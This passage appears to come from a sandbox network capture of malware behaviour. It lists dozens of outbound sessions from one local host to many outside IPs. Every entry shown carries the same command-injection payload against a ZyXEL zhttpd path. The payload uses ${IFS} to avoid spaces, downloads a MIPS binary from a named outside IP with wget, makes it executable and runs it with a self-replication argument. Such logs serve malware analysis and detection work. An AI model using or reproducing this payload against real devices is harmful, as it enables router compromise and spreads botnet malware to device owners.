                                                Jan 28, 2024 10:16:32.922770023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6272192.168.2.2346994175.76.104.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922801971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6273192.168.2.2343724176.120.39.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922833920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6274192.168.2.2357596165.93.132.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922846079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6275192.168.2.236037040.178.198.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922883987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6276192.168.2.2344248154.194.71.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922919035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6277192.168.2.2358622222.226.201.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922945023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6278192.168.2.2346366201.40.23.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922991037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6279192.168.2.2359230156.18.246.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923007965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6280192.168.2.2353822108.123.161.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923022985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6281192.168.2.233998488.46.27.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923048019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6282192.168.2.236085242.196.24.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923077106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6283192.168.2.2337258106.156.80.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923110962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6284192.168.2.235648062.147.55.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923130989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6285192.168.2.234670282.181.115.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923149109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6286192.168.2.234702818.157.48.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923224926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6287192.168.2.2351044196.55.70.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923244953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6288192.168.2.233448076.30.165.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923247099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6289192.168.2.2345826155.166.199.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923278093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6290192.168.2.233637497.208.135.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923299074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6291192.168.2.233890431.213.214.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923336983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6292192.168.2.235454249.163.45.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923352003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6293192.168.2.2360958197.135.224.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923378944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6294192.168.2.2346864180.33.11.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923401117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6295192.168.2.233955644.38.98.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923435926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6296192.168.2.2354936184.150.231.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923474073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6297192.168.2.2336636217.210.202.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923486948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6298192.168.2.2345098206.234.25.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923531055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6299192.168.2.233289676.220.133.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923563004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6300192.168.2.234777613.223.22.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923588037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6301192.168.2.235451475.127.206.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923613071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6302192.168.2.2334598199.75.161.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923641920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6303192.168.2.2341132186.184.101.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923655987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6304192.168.2.2339634150.0.107.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923677921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6305192.168.2.234581048.231.244.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923712969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6306192.168.2.234594292.27.97.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923743010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6307192.168.2.23420684.188.89.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923768997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6308192.168.2.2345870120.227.220.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923813105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6309192.168.2.234018427.109.252.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923826933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6310192.168.2.234973835.8.148.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923866987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6311192.168.2.233813287.6.180.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923906088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6312192.168.2.2357246178.243.191.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923923969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6313192.168.2.235628067.57.213.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923935890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6314192.168.2.2341220139.250.178.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923979044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6315192.168.2.235714245.118.152.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.923994064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6316192.168.2.235853249.110.145.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924020052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6317192.168.2.2343500140.164.119.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924066067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6318192.168.2.2360420209.29.163.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924086094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6319192.168.2.235454252.249.42.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924103975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6320192.168.2.2339880110.107.153.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924125910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6321192.168.2.236052091.189.67.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924150944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6322192.168.2.2344010103.120.95.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924186945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6323192.168.2.2351286166.157.173.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924211979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6324192.168.2.2339520220.167.13.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924245119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6325192.168.2.2349472119.107.223.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924283028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6326192.168.2.2350930186.212.129.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924298048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6327192.168.2.23525984.107.87.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924355030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6328192.168.2.2356314120.14.131.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924372911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6329192.168.2.2359128123.138.44.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924395084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6330192.168.2.2355998192.130.253.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924432993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6331192.168.2.23436628.217.223.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924438000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6332192.168.2.2343966132.240.152.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924459934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6333192.168.2.2340676130.210.208.40443
                                                TimestampBytes transferredDirectionData
